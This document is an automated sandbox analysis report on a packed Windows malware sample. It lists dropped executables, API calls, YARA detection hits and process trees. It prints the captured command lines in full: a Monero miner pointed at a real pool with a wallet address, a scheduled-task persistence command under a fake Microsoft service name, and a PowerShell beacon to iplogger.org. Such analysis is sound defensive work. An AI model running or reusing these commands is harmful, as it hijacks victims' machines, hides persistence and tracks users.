                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00405252 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,
                  Source: jo.exe, 0000001F.00000002.505910725.0000000000AAA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeWindow created: window name: CLIPBRDWNDCLASS
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeWindow created: window name: CLIPBRDWNDCLASS

                  System Summary:

                  barindex
                  PE file contains section with special charsShow sources
                  Source: 8TD8GfTtaW.exeStatic PE information: section name:
                  Source: 8TD8GfTtaW.exeStatic PE information: section name:
                  Source: 8TD8GfTtaW.exeStatic PE information: section name:
                  Source: nulhfhsi.exe.0.drStatic PE information: section name:
                  Source: nulhfhsi.exe.0.drStatic PE information: section name:
                  Source: nulhfhsi.exe.0.drStatic PE information: section name:
                  Source: lxoqz3o0.exe.0.drStatic PE information: section name:
                  Source: lxoqz3o0.exe.0.drStatic PE information: section name:
                  Source: lxoqz3o0.exe.0.drStatic PE information: section name:
                  Source: RantimeBroker.exe.6.drStatic PE information: section name:
                  Source: RantimeBroker.exe.6.drStatic PE information: section name:
                  Source: RantimeBroker.exe.6.drStatic PE information: section name:
                  Source: Chrome updater.exe.25.drStatic PE information: section name:
                  Source: Chrome updater.exe.25.drStatic PE information: section name:
                  Source: Chrome updater.exe.25.drStatic PE information: section name:
                  Writes or reads registry keys via WMIShow sources
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Writes registry values via WMIShow sources
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00401544 GetProcAddress,NtCreateSection,memset,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00401502 NtMapViewOfSection,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008B7507 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008BB2F1 NtQueryVirtualMemory,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeFile created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sysJump to behavior
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeCode function: 4_2_0372C3D0
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeCode function: 4_2_0372EC5A
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008BB0CC
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008B23FC
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008B936B
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_004365D0
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00417130
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_00416350
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_0042A330
                  Source: 8TD8GfTtaW.exeStatic PE information: invalid certificate
                  Source: nulhfhsi.exe.0.drStatic PE information: Number of sections : 11 > 10
                  Source: cpu.exe.6.drStatic PE information: Number of sections : 13 > 10
                  Source: nulhfhsi.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: cpu.exe.6.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Chrome updater.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: Chrome updater.exe.25.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                  Source: 8TD8GfTtaW.exeBinary or memory string: OriginalFilename vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.268352311.0000000001394000.00000020.00020000.sdmpBinary or memory string: OriginalFilenameLoader.exeL vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.274119468.0000000006140000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.274390179.0000000006240000.00000002.00000001.sdmpBinary or memory string: originalfilename vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.274390179.0000000006240000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exe, 00000000.00000002.273615227.0000000005360000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameKernelbase.dll.muij% vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exeBinary or memory string: OriginalFilenameLoader.exeL vs 8TD8GfTtaW.exe
                  Source: 8TD8GfTtaW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                  Source: 00000004.00000003.395439436.0000000006A7E000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000004.00000003.395495832.0000000006A8E000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000010.00000002.502801011.000002ABFF27A000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000004.00000003.395598364.0000000006AAB000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000010.00000002.502678236.000002ABFF250000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000004.00000002.476458617.0000000004A5A000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000010.00000002.502700687.000002ABFF257000.00000004.00000020.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 00000004.00000003.395324200.0000000006A7E000.00000004.00000001.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: Process Memory Space: conhost.exe PID: 5544, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: Process Memory Space: RantimeBroker.exe PID: 6352, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
                  Source: 37.2.Chrome updater.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                  Source: 25.2.revs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                  Source: Chrome updater.exe.25.drStatic PE information: Section: ZLIB complexity 0.995197233607
                  Source: WinRing0x64.sys.6.drBinary string: \Device\WinRing0_1_2_0
                  Source: classification engineClassification label: mal100.troj.adwa.spyw.evad.mine.winEXE@37/49@16/12
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00403248 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_0040450D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_008B82EB CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeCode function: 22_2_00402138 CoCreateInstance,MultiByteToWideChar,
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeCode function: 31_2_004365D0 LocalAlloc,CreateTimerQueue,GetTickCount,ZombifyActCtx,GetCompressedFileSizeA,VirtualProtect,MapUserPhysicalPages,CreateJobObjectW,RtlAllocateHeap,GetFileAttributesA,LoadResource,RtlSizeHeap,
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile created: C:\Users\user\AppData\Local\nulhfhsi.exeJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4648:120:WilError_01
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeMutant created: \Sessions\1\BaseNamedObjects\3d8f939a-7191-48a7-9jo8-2cc28dtec736
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5544:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1488:120:WilError_01
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_01
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeMutant created: \Sessions\1\BaseNamedObjects\QWERTYUIOPASDFGHJKLZXCVBNM1234567890
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6060:120:WilError_01
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile created: C:\Users\user\AppData\Local\Temp\tmp6692.tmpJump to behavior
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId=&apos;1&apos;
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: 8TD8GfTtaW.exeVirustotal: Detection: 43%
                  Source: unknownProcess created: C:\Users\user\Desktop\8TD8GfTtaW.exe 'C:\Users\user\Desktop\8TD8GfTtaW.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Local\nulhfhsi.exe 'C:\Users\user\AppData\Local\nulhfhsi.exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Local\lxoqz3o0.exe 'C:\Users\user\AppData\Local\lxoqz3o0.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\evs.exe 'C:\Users\user\AppData\Local\Temp\evs.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\revs.exe 'C:\Users\user\AppData\Local\Temp\revs.exe'
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe 'hello_C# (2).exe'
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\hello_C#.exe 'hello_C#.exe'
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\jo.exe 'jo.exe'
                  Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
                  Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6064 CREDAT:17410 /prefetch:2
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome updater.exe'
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess created: C:\Users\user\AppData\Local\nulhfhsi.exe 'C:\Users\user\AppData\Local\nulhfhsi.exe'
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeProcess created: C:\Users\user\AppData\Local\lxoqz3o0.exe 'C:\Users\user\AppData\Local\lxoqz3o0.exe'
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess created: C:\Users\user\AppData\Local\Temp\evs.exe 'C:\Users\user\AppData\Local\Temp\evs.exe'
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeProcess created: C:\Users\user\AppData\Local\Temp\revs.exe 'C:\Users\user\AppData\Local\Temp\revs.exe'
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeProcess created: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe 'C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe' -o stratum+tcp://pool.minexmr.com:4444 --algo cn/r -u 42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j./ --donate-level=1
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /create /sc MINUTE /mo 1 /tn 'Windows Service Microsoft Corporation' /tr 'C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe' /f
                  Source: C:\Users\user\AppData\Local\Temp\evs.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd' /c start '' 'hello_C# (2).exe' & start '' 'hello_C#.exe' & start '' 'jo.exe' & powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\hello_C# (2).exe 'hello_C# (2).exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\hello_C#.exe 'hello_C#.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\jo.exe 'jo.exe'
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command 'Invoke-WebRequest -Uri https://iplogger.org/1n6Zw7'
                  Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6064 CREDAT:17410 /prefetch:2
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32
                  Source: C:\Users\user\AppData\Local\Temp\hello_C# (2).exeAutomated click: OK
                  Source: C:\Users\user\AppData\Local\Temp\hello_C#.exeAutomated click: OK
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: 8TD8GfTtaW.exeStatic file information: File size 2649312 > 1048576
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                  Source: 8TD8GfTtaW.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x281a00
                  Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8TD8GfTtaW.exe, 00000000.00000002.268372071.000000000139C000.00000040.00020000.sdmp, lxoqz3o0.exe, 00000006.00000002.498547574.0000000000100000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000E.00000002.501902431.0000000001140000.00000040.00020000.sdmp, revs.exe, 00000019.00000002.500038394.000000000041A000.00000040.00020000.sdmp, Chrome updater.exe, 00000025.00000002.500186949.000000000041A000.00000040.00020000.sdmp
                  Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr
                  Source: Binary string: Z:\Oreans Projects\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: nulhfhsi.exe, 00000004.00000002.444265627.00000000004B6000.00000040.00020000.sdmp

                  Data Obfuscation:

                  barindex
                  Detected unpacking (changes PE section rights)Show sources
                  Source: C:\Users\user\Desktop\8TD8GfTtaW.exeUnpacked PE file: 0.2.8TD8GfTtaW.exe.1390000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                  Source: C:\Users\user\AppData\Local\nulhfhsi.exeUnpacked PE file: 4.2.nulhfhsi.exe.3b0000.0.unpack :ER; :R; :R;.idata:W;.apk0:R;.themida:EW;.boot:ER;.apk1:ER;.apk2:ER;.reloc:R;.rsrc:R; vs :ER; :R; :R;
                  Source: C:\Users\user\AppData\Local\lxoqz3o0.exeUnpacked PE file: 6.2.lxoqz3o0.exe.f0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                  Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exeUnpacked PE file: 14.2.RantimeBroker.exe.1130000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                  Source: C:\Users\user\AppData\Local\Temp\revs.exeUnpacked PE file: 25.2.revs.exe.400000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                  Source: C:\Users\user\AppData\Local\Temp\jo.exeUnpacked PE file: 31.2.jo.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.bss:W;.rsrc:R;.reloc:R;
